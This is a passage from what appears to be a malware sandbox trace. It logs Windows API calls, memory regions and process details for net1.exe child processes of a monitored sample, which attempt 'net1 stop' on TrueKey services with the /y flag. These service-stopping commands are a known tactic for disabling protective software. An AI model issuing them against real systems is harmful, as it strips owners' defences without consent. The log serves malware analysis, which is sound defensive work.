_fileno (_File=0x7fefdba2a80) returned 0 [0117.208] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0117.208] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.208] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.208] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.208] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.208] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.208] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.208] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.208] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.208] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.208] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.208] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.208] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.208] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.208] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.209] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.209] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.209] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.209] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.209] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.209] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.209] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.209] _wcsicmp (_String1="accounts", _String2="TrueKeyScheduler") returned -19 [0117.209] _wcsicmp (_String1="computer", _String2="TrueKeyScheduler") returned -17 [0117.209] _wcsicmp (_String1="config", _String2="TrueKeyScheduler") returned -17 [0117.209] _wcsicmp (_String1="continue", _String2="TrueKeyScheduler") returned -17 [0117.209] _wcsicmp (_String1="cont", _String2="TrueKeyScheduler") returned -17 [0117.209] _wcsicmp (_String1="file", _String2="TrueKeyScheduler") returned -14 [0117.209] _wcsicmp (_String1="files", _String2="TrueKeyScheduler") returned -14 [0117.209] _wcsicmp (_String1="group", _String2="TrueKeyScheduler") returned -13 [0117.209] _wcsicmp (_String1="groups", _String2="TrueKeyScheduler") returned -13 [0117.209] _wcsicmp (_String1="help", _String2="TrueKeyScheduler") returned -12 [0117.209] _wcsicmp (_String1="helpmsg", _String2="TrueKeyScheduler") returned -12 [0117.209] _wcsicmp (_String1="localgroup", _String2="TrueKeyScheduler") returned -8 [0117.210] _wcsicmp (_String1="pause", _String2="TrueKeyScheduler") returned -4 [0117.210] _wcsicmp (_String1="session", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="sessions", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="sess", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="share", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="start", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="stats", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="statistics", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="stop", _String2="TrueKeyScheduler") returned -1 [0117.210] _wcsicmp (_String1="time", _String2="TrueKeyScheduler") returned -9 [0117.210] _wcsicmp (_String1="user", _String2="TrueKeyScheduler") returned 1 [0117.210] _wcsicmp (_String1="users", _String2="TrueKeyScheduler") returned 1 [0117.210] _wcsicmp (_String1="msg", _String2="TrueKeyScheduler") returned -7 [0117.210] _wcsicmp (_String1="messenger", _String2="TrueKeyScheduler") returned -7 [0117.210] _wcsicmp (_String1="receiver", _String2="TrueKeyScheduler") returned -2 [0117.210] _wcsicmp (_String1="rcv", _String2="TrueKeyScheduler") returned -2 [0117.210] _wcsicmp (_String1="netpopup", _String2="TrueKeyScheduler") returned -6 [0117.210] _wcsicmp (_String1="redirector", _String2="TrueKeyScheduler") returned -2 [0117.210] _wcsicmp (_String1="redir", _String2="TrueKeyScheduler") returned -2 [0117.210] _wcsicmp (_String1="rdr", _String2="TrueKeyScheduler") returned -2 [0117.210] _wcsicmp (_String1="workstation", _String2="TrueKeyScheduler") returned 3 [0117.211] _wcsicmp (_String1="work", _String2="TrueKeyScheduler") returned 3 [0117.211] _wcsicmp (_String1="wksta", _String2="TrueKeyScheduler") returned 3 [0117.211] _wcsicmp (_String1="prdr", _String2="TrueKeyScheduler") returned -4 [0117.211] _wcsicmp (_String1="devrdr", _String2="TrueKeyScheduler") returned -16 [0117.211] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKeyScheduler") returned -8 [0117.211] _wcsicmp (_String1="server", _String2="TrueKeyScheduler") returned -1 [0117.211] _wcsicmp (_String1="svr", _String2="TrueKeyScheduler") returned -1 [0117.211] _wcsicmp (_String1="srv", _String2="TrueKeyScheduler") returned -1 [0117.211] _wcsicmp (_String1="lanmanserver", _String2="TrueKeyScheduler") returned -8 [0117.211] _wcsicmp (_String1="alerter", _String2="TrueKeyScheduler") returned -19 [0117.211] _wcsicmp (_String1="netlogon", _String2="TrueKeyScheduler") returned -6 [0117.211] _wcsupr (in: _String="TrueKeyScheduler" | out: _String="TRUEKEYSCHEDULER") returned="TRUEKEYSCHEDULER" [0117.212] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9ce10 [0117.218] GetServiceKeyNameW (in: hSCManager=0x9ce10, lpDisplayName="TRUEKEYSCHEDULER", lpServiceName=0xffe15750, lpcchBuffer=0x28f788 | out: lpServiceName="", lpcchBuffer=0x28f788) returned 0 [0117.219] _wcsicmp (_String1="msg", _String2="TRUEKEYSCHEDULER") returned -7 [0117.219] _wcsicmp (_String1="messenger", _String2="TRUEKEYSCHEDULER") returned -7 [0117.219] _wcsicmp (_String1="receiver", _String2="TRUEKEYSCHEDULER") returned -2 [0117.219] _wcsicmp (_String1="rcv", _String2="TRUEKEYSCHEDULER") returned -2 [0117.219] _wcsicmp (_String1="redirector", _String2="TRUEKEYSCHEDULER") returned -2 [0117.220] _wcsicmp (_String1="redir", _String2="TRUEKEYSCHEDULER") returned -2 [0117.220] _wcsicmp (_String1="rdr", _String2="TRUEKEYSCHEDULER") returned -2 [0117.220] _wcsicmp (_String1="workstation", _String2="TRUEKEYSCHEDULER") returned 3 [0117.220] _wcsicmp (_String1="work", _String2="TRUEKEYSCHEDULER") returned 3 [0117.220] _wcsicmp (_String1="wksta", _String2="TRUEKEYSCHEDULER") returned 3 [0117.220] _wcsicmp (_String1="prdr", _String2="TRUEKEYSCHEDULER") returned -4 [0117.220] _wcsicmp (_String1="devrdr", _String2="TRUEKEYSCHEDULER") returned -16 [0117.220] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEYSCHEDULER") returned -8 [0117.220] _wcsicmp (_String1="server", _String2="TRUEKEYSCHEDULER") returned -1 [0117.220] _wcsicmp (_String1="svr", _String2="TRUEKEYSCHEDULER") returned -1 [0117.220] _wcsicmp (_String1="srv", _String2="TRUEKEYSCHEDULER") returned -1 [0117.220] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEYSCHEDULER") returned -8 [0117.220] _wcsicmp (_String1="alerter", _String2="TRUEKEYSCHEDULER") returned -19 [0117.220] _wcsicmp (_String1="netlogon", _String2="TRUEKEYSCHEDULER") returned -6 [0117.220] NetServiceControl (in: servername=0x0, service="TRUEKEYSCHEDULER", opcode=0x0, arg=0x0, bufptr=0x28f790 | out: bufptr=0x28f790) returned 0x889 [0117.221] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.221] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0117.222] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0117.224] GetFileType (hFile=0xb) returned 0x2 [0117.224] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f658 | out: lpMode=0x28f658) returned 1 [0117.225] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f650, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x28f650*=0x1e) returned 1 [0117.225] GetFileType (hFile=0xb) returned 0x2 [0117.225] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f658 | out: lpMode=0x28f658) returned 1 [0117.225] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f650, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x28f650*=0x2) returned 1 [0117.226] _ultow (in: _Dest=0x889, _Radix=2684608 | out: _Dest=0x889) returned="2185" [0117.226] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0117.226] GetFileType (hFile=0xb) returned 0x2 [0117.226] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f658 | out: lpMode=0x28f658) returned 1 [0117.226] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe15b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f650, lpReserved=0x0 | out: lpBuffer=0xffe15b50*, lpNumberOfCharsWritten=0x28f650*=0x34) returned 1 [0117.227] GetFileType (hFile=0xb) returned 0x2 [0117.227] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f658 | out: lpMode=0x28f658) returned 1 [0117.227] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f650, lpReserved=0x0 | out: lpBuffer=0xffdf1efc*, lpNumberOfCharsWritten=0x28f650*=0x2) returned 1 [0117.228] NetApiBufferFree (Buffer=0x94d50) returned 0x0 [0117.228] NetApiBufferFree (Buffer=0x9c100) returned 0x0 [0117.228] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyScheduler /y" [0117.228] exit (_Code=2) Process: id = "332" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x22b1000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "326" os_parent_pid = "0x528" cmd_line = "C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11734 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11735 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11736 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11737 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 11738 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11739 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11740 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11741 start_va = 0xffdf0000 end_va = 0xffe22fff entry_point = 0xffdf0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11742 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11743 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11744 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 11745 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 11746 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11747 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11748 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 11749 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11750 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11751 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11752 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11753 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11754 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 11755 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 11756 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11757 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11758 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11759 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11760 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11761 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11762 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11763 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11764 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11765 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11766 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11767 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11768 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11769 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11770 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11771 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11773 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 855 os_tid = 0x1200 [0117.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af990 | out: lpSystemTimeAsFileTime=0x1af990*(dwLowDateTime=0xfaf2d1f0, dwHighDateTime=0x1d48689)) [0117.118] GetCurrentProcessId () returned 0xb50 [0117.119] GetCurrentThreadId () returned 0x1200 [0117.119] GetTickCount () returned 0x26f36 [0117.119] QueryPerformanceCounter (in: lpPerformanceCount=0x1af998 | out: lpPerformanceCount=0x1af998*=1816403700000) returned 1 [0117.120] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0117.120] __set_app_type (_Type=0x1) [0117.120] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe09c9c) returned 0x0 [0117.120] __getmainargs (in: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788, _DoWildCard=0, _StartInfo=0xffe1479c | out: _Argc=0xffe14780, _Argv=0xffe14790, _Env=0xffe14788) returned 0 [0117.120] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.120] GetConsoleOutputCP () returned 0x1b5 [0117.229] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe1cec0 | out: lpCPInfo=0xffe1cec0) returned 1 [0117.229] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0117.231] sprintf_s (in: _DstBuf=0x1af938, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.232] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.234] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0117.234] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKeyServiceHelper /y" [0117.234] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af6d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0117.234] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.234] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af928 | out: Buffer=0x1af928*=0x214d60) returned 0x0 [0117.234] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af928 | out: Buffer=0x1af928*=0x21c130) returned 0x0 [0117.234] _fileno (_File=0x7fefdba2a80) returned 0 [0117.235] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0117.235] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.235] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.235] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.235] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.235] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.235] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.235] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.235] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.235] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.235] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.235] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.235] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.235] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.235] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.235] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.235] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.235] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.235] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.235] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.235] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.235] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.236] _wcsicmp (_String1="accounts", _String2="TrueKeyServiceHelper") returned -19 [0117.236] _wcsicmp (_String1="computer", _String2="TrueKeyServiceHelper") returned -17 [0117.236] _wcsicmp (_String1="config", _String2="TrueKeyServiceHelper") returned -17 [0117.236] _wcsicmp (_String1="continue", _String2="TrueKeyServiceHelper") returned -17 [0117.236] _wcsicmp (_String1="cont", _String2="TrueKeyServiceHelper") returned -17 [0117.236] _wcsicmp (_String1="file", _String2="TrueKeyServiceHelper") returned -14 [0117.236] _wcsicmp (_String1="files", _String2="TrueKeyServiceHelper") returned -14 [0117.236] _wcsicmp (_String1="group", _String2="TrueKeyServiceHelper") returned -13 [0117.236] _wcsicmp (_String1="groups", _String2="TrueKeyServiceHelper") returned -13 [0117.236] _wcsicmp (_String1="help", _String2="TrueKeyServiceHelper") returned -12 [0117.236] _wcsicmp (_String1="helpmsg", _String2="TrueKeyServiceHelper") returned -12 [0117.236] _wcsicmp (_String1="localgroup", _String2="TrueKeyServiceHelper") returned -8 [0117.236] _wcsicmp (_String1="pause", _String2="TrueKeyServiceHelper") returned -4 [0117.236] _wcsicmp (_String1="session", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="sessions", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="sess", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="share", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="start", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="stats", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="statistics", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="stop", _String2="TrueKeyServiceHelper") returned -1 [0117.236] _wcsicmp (_String1="time", _String2="TrueKeyServiceHelper") returned -9 [0117.236] _wcsicmp (_String1="user", _String2="TrueKeyServiceHelper") returned 1 [0117.236] _wcsicmp (_String1="users", _String2="TrueKeyServiceHelper") returned 1 [0117.237] _wcsicmp (_String1="msg", _String2="TrueKeyServiceHelper") returned -7 [0117.237] _wcsicmp (_String1="messenger", _String2="TrueKeyServiceHelper") returned -7 [0117.237] _wcsicmp (_String1="receiver", _String2="TrueKeyServiceHelper") returned -2 [0117.237] _wcsicmp (_String1="rcv", _String2="TrueKeyServiceHelper") returned -2 [0117.237] _wcsicmp (_String1="netpopup", _String2="TrueKeyServiceHelper") returned -6 [0117.237] _wcsicmp (_String1="redirector", _String2="TrueKeyServiceHelper") returned -2 [0117.237] _wcsicmp (_String1="redir", _String2="TrueKeyServiceHelper") returned -2 [0117.237] _wcsicmp (_String1="rdr", _String2="TrueKeyServiceHelper") returned -2 [0117.237] _wcsicmp (_String1="workstation", _String2="TrueKeyServiceHelper") returned 3 [0117.237] _wcsicmp (_String1="work", _String2="TrueKeyServiceHelper") returned 3 [0117.237] _wcsicmp (_String1="wksta", _String2="TrueKeyServiceHelper") returned 3 [0117.237] _wcsicmp (_String1="prdr", _String2="TrueKeyServiceHelper") returned -4 [0117.237] _wcsicmp (_String1="devrdr", _String2="TrueKeyServiceHelper") returned -16 [0117.237] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKeyServiceHelper") returned -8 [0117.237] _wcsicmp (_String1="server", _String2="TrueKeyServiceHelper") returned -1 [0117.237] _wcsicmp (_String1="svr", _String2="TrueKeyServiceHelper") returned -1 [0117.237] _wcsicmp (_String1="srv", _String2="TrueKeyServiceHelper") returned -1 [0117.237] _wcsicmp (_String1="lanmanserver", _String2="TrueKeyServiceHelper") returned -8 [0117.237] _wcsicmp (_String1="alerter", _String2="TrueKeyServiceHelper") returned -19 [0117.237] _wcsicmp (_String1="netlogon", _String2="TrueKeyServiceHelper") returned -6 [0117.237] _wcsupr (in: _String="TrueKeyServiceHelper" | out: _String="TRUEKEYSERVICEHELPER") returned="TRUEKEYSERVICEHELPER" [0117.238] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x21ce40 [0117.242] GetServiceKeyNameW (in: hSCManager=0x21ce40, lpDisplayName="TRUEKEYSERVICEHELPER", lpServiceName=0xffe15750, lpcchBuffer=0x1af848 | out: lpServiceName="", lpcchBuffer=0x1af848) returned 0 [0117.244] _wcsicmp (_String1="msg", _String2="TRUEKEYSERVICEHELPER") returned -7 [0117.244] _wcsicmp (_String1="messenger", _String2="TRUEKEYSERVICEHELPER") returned -7 [0117.244] _wcsicmp (_String1="receiver", _String2="TRUEKEYSERVICEHELPER") returned -2 [0117.244] _wcsicmp (_String1="rcv", _String2="TRUEKEYSERVICEHELPER") returned -2 [0117.244] _wcsicmp (_String1="redirector", _String2="TRUEKEYSERVICEHELPER") returned -2 [0117.244] _wcsicmp (_String1="redir", _String2="TRUEKEYSERVICEHELPER") returned -2 [0117.244] _wcsicmp (_String1="rdr", _String2="TRUEKEYSERVICEHELPER") returned -2 [0117.244] _wcsicmp (_String1="workstation", _String2="TRUEKEYSERVICEHELPER") returned 3 [0117.244] _wcsicmp (_String1="work", _String2="TRUEKEYSERVICEHELPER") returned 3 [0117.244] _wcsicmp (_String1="wksta", _String2="TRUEKEYSERVICEHELPER") returned 3 [0117.244] _wcsicmp (_String1="prdr", _String2="TRUEKEYSERVICEHELPER") returned -4 [0117.244] _wcsicmp (_String1="devrdr", _String2="TRUEKEYSERVICEHELPER") returned -16 [0117.244] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEYSERVICEHELPER") returned -8 [0117.244] _wcsicmp (_String1="server", _String2="TRUEKEYSERVICEHELPER") returned -1 [0117.244] _wcsicmp (_String1="svr", _String2="TRUEKEYSERVICEHELPER") returned -1 [0117.244] _wcsicmp (_String1="srv", _String2="TRUEKEYSERVICEHELPER") returned -1 [0117.244] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEYSERVICEHELPER") returned -8 [0117.244] _wcsicmp (_String1="alerter", _String2="TRUEKEYSERVICEHELPER") returned -19 [0117.244] _wcsicmp (_String1="netlogon", _String2="TRUEKEYSERVICEHELPER") returned -6 [0117.245] NetServiceControl (in: servername=0x0, service="TRUEKEYSERVICEHELPER", opcode=0x0, arg=0x0, bufptr=0x1af850 | out: bufptr=0x1af850) returned 0x889 [0117.246] wcscpy_s (in: _Destination=0xffe180d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.246] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0117.247] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe15b50, nSize=0x800, Arguments=0xffe17f90 | out: 